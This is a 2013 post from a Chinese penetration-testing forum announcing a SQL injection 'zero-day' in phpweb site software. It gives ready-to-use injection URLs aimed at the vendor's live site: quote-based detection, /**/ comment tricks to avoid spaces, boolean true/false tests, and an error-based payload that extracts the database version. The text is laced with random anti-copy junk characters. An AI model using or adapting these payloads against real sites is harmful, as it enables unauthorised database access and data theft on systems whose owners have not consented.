找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2275|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入0 [& i& K' J* q
$ N; k4 H2 E% x, Y  z+ F
主站:http://phpweb.net/% {! n" ~2 [) }
加’检测:+ \; |; o3 Z0 u# f5 H
$ m. n; i; T  i5 @4 z
http://www.phpweb.net/down/html/?772′.html
! F4 L& Z/ F0 u9 x% K2 g$ @ / j" g8 V* b8 H: e
出错5 S6 T. i1 @* V
存在注入。8 G# D1 @6 y' S
不能用空格,只能用/*罗+ J6 G& A8 }% K3 N
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
1 j2 u- \+ h4 ^, _% `' w
" _4 {" [! a; U) hhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
& S% t6 M6 R1 ^/ e爆数据库版本:, G* O/ \$ b- k: n

. {8 S+ U; a, r& E! Y: {: N?
! B  L8 _5 i/ B, q12 h% e( \4 D0 h, {. b7 J7 R, [
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
$ j. L) N7 H9 @8 [, m6 m更新日期: 2013-01-03 13:39:50        
2 a8 f+ W3 C7 ]) ?' K0 x$ t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表